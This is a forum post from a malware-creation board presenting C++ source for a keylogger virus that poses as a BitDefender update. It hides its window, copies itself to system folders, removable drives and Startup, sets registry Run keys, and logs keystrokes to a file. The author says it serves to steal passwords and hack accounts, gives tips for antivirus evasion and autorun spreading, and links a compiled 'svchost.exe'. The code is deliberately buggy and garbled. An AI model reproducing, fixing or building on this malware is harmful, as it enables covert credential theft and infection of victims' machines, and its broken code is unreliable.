Friday, 2024-03-29, 9:52 AM
Welcome Guest

Sec_rity without U

Main | virus in c++ | GreenPoison - Forum | Registration | Login | RSS
[ New messages · Members · Forum rules · Search · RSS ]
  • Page 1 of 1
  • 1
Forum » Virus & Malwares » Creation of VIRUS & MALWARE » virus in c++ | GreenPoison (Bitdefender.exe virus in c++)
virus in c++ | GreenPoison
greenpoisonDate: Tuesday, 2011-11-29, 2:57 PM | Message # 1
Private
Group: Users
Messages: 8
Awards: 0
Reputation: 0
Status: Offline
Dis virus could be used as a hacking tool to log peoples passwords and hack mails or any password protected accounts.

Quote
#include <windows.h>
#include <Winuser.h>
#include <string>
#include <fstream>

string Getkeypress(int keypress)
{
string tempkeypress = "";

if (keypress == 8)
tempkeypress = "[delete]";
else if (keypress == 13)
tempkeypress = "\n"
else if (keypress == 32)
tempeypress = " "
else if (keypress == VK_PAUSE)
tempkeypress = "[PAUSE]";
else if (keypress == VK_CAPITAL)
tempkeypress = "[CAPITAL]";
else if (keypress == VK_SHIFT)
tempkeypress = "[SHIFT]";
else if (keypress == VK_TAB)
tempkeypress = "[TABULATOR]";
else if (keypress == VK_CONTROL)
tempkeypress = "[CTRL]";
else if (keypress == VK_ESCAPE)
tempkeypress = "[ESCAPE]";
else if (keypress == VK_END)
tempkeypress = "[END]";
else if (keypress == VK_HOME)
tempkeyress = "[HOME]";
else if (keypress == VK_LEFT)
tempkeypress = "[left]";
else if (keypress == VK_RIGHT)
tempkeypress = "[right]";
else if (keypress == VK_UP)
tempkeypress = "[UP]";
else if (keypress == VK_DOWN)
tempkeypress = "[DOWN]";
else if (keypress == VK_SNAPSHOT)
tempkeypress = "[SNAPSHOT]";
else if (keypress == VK_NUMLOCK)
tempkeypress = "[NUMLOCK]";
else if (keypress == 190 || keypress == 110)
tempkeypress = ".";
else if (keypress >=96 && keypress <= 105)
tempkypress = keypress-48;
else if (keypress > 47 && keypress < 60)
tempkeypress = keypress;
if (keypress != VK_LBUTTON || keypress != VK_RBUTTON)
{
if (keypress > 64 && keypress < 91)
{
if (GetkeypressState(VK_CAPITAL))
tempkeypress = keypress;
else
{
keypress = keypress + 32;
tempkeypress = keypress;
}
}
}

return tempkeypress;
}
int main()
{

HWND hide;
char system[TOT_SIZ],system2[TOT_SIZ];
HKEY stup,fixstup;
TCHAR SIZ[TOT_SIZ];
char temprot[TOT_SIZ];
TCHAR FIXSTUPPATH[TOT_SIZ+12]="\\BitDefender Updates.exe";
char LOCATE[TOT_SIZ];/*creating hide */
AllocConsole();
hide=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(hide,0);
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,LOCATE,sizeof(LOCATE));
GetModuleFileName(NULL,SIZ,TOT_SIZ);
GetSystemDirectory(system,sizeof(system));
GetSystemDirectory(system2,sizeof(system2));
//WRT 2SYS DRV AL PSBL DRV ONS
//temprot[0]=system[0];
//std::strcat(temprot,":\\Program Files\\BitDefender\\BitDefender Updates.exe");
std::strcat(system,"\\BitDefenderUpdates.exe");
//std::strcat(system2,"\\drveprotect.exe");
std::strcat(system2,FIXSTUPPATH);
CopyFile(LOCATE,temprot,false);
CopyFile(LOCATE,system,false);
CopyFile(LOCATE,system2,false);
CopyFile(LOCATE,"E:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"F:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"G:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"H:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"I:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"J:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\BITDEFENDER_UPDATE.exe",false);
CopyFile(LOCATE,"C:\\SAS\\BITDEFENDER_UPDATE.exe",false);
std::string Filename = "C:\\SAS.txt";
/*srt up*/
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",

&stup);
//st fix
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",

&fixstup);
//ste fst
RegSetValueEx(fixstup,
"BIT DEFENDER UPDATES ",
0,

RE_SZ,
(LPBYTE)system2,
sizeof(system2));
//stup fixed
RegSetValueEx(stup,
"BIT DEFENDER UPDATES",
0,
REG_SZ,
(LPBYTE)SIZ,
sizeof(SIZ));

/* Close the keypress. */
RegClosekeypress(stup);
RegClosekeypress(fixstup);
std::string TempString =
Fstream FStream;
FStream.pen(Filename., std::fstream::out | std::fstream:);
//FStream.write(
while(1==1)
{

Sleep(3);

for(int i = 8; i < 191; i++)
{
if(GetAsynckeypressState(i)&1 ==1)
{
TempString = Getkeypress (i);

FStream.write(TempString.c_str(), TempString.size());
FStream.close();
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
}
}
}
}


LS learn C Not 16 BIT,WINDOWS C++ Before reading on. Get the THE WIN HELP FILE for reference.
THE FIRST FUNCTION is the Key Logger Part(Pay Load) which simply logs ket strokes
Getkeypress(int keypress)
GetAsynckeypressState This module got the state of each keys which is passes over to our Function ,The int ASCII VALUE od the keys and converted to Strings and saved in a file in C:\SAS.TXT
PS: This is not a gud mehod for making a keylogger but preferably the first and easy option . Piping out the key strokes using the key board hooks are the best method for doing it(GOOGLE for it)

***********Then the Main Function the heart of the Virus*************
what it does
1)geting the handle to the windows created USING HWND
FindWindowA("ConsoleWindowClass",NULL);
2)Registry entry VALUSE HKEY

*********Then the HIDE HANDLE to handle the virus******************
3)Using the Handle obtained in "HIDE" we ill set it to be hidden so that it ill run in the background bt not visible.
GetModuleFileName(GetModH,LOCATE,sizeof(LOCATE));
4)Used to get the current path handle for moving it from current position to another
5)GetModuleFileName
Used to get the current system directory it differs on the installation of windows on diff drives.

*********VICTIMS SYSTEM FILE LOCATION***************
6)Once after getting the system directory EX:C:\WINDOWS\SYSTEM32
7)I append the path of virus copy C:\WINDOWS\SYSTEM32 + BitDefenderUpdates.exe USING STRING CAT FUNCTION
8)Now copy frm current executed path to new place using CopyFile(LOCATE,temprot,false);
CopyFile(LOCATE,"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\BITDEFENDER_UPDATE.exe",false);

************Breath of Virus*******************
9)Setting it to get autoloaded every tym Windows starts ,we simply append few lines to the registry.
We write 2 star up entryone a link to the current module and one to a fixed path so to evade frm common AV detection.
RegSetValueEx(fixstup,"BIT DEFENDER UPDATES ",0,RE_SZ,(LPBYTE)system2,sizeof(system2));
Its ready

****************The wings n legs of Virus*******************
M npt including dose part as it is simple , jst write a text file with autorun entries to the removable drives n hence it ill b able to spread

*****************************Other Techniques n Improvements***********************
Just by adding few more codes u can make it UD by PROCESS VIVERS n TASK MANAGERS
Just by doing few more researchs u can make it UD by AV
Instead of the direct startup entry use a parasitic infection technique to get auto started ,This don't chk whether a removable media xsists.
Add a function to chk the presence n then append. The virus may use SHChangeNotifyRegister to get notified of ny new drives
U can use SetWindowHookEx() to avoid the infinite loop. Or better hooking keybd driver in kernel

Just copy paste n compile won't work Tongue for dese codes as dey hav som bugs in it Wink lol .If u rlly want to make a virus den u may try to investigate n correct dose errors. Tongue . bt if u want spoonfeeding den download compiled exe file frm here
Code:

http://rapidshare.com/files/222730177/svchost.exe.html

MD5: 456A68913061CEED3D46FB5E813F7EEB
 
Forum » Virus & Malwares » Creation of VIRUS & MALWARE » virus in c++ | GreenPoison (Bitdefender.exe virus in c++)
  • Page 1 of 1
  • 1
Search: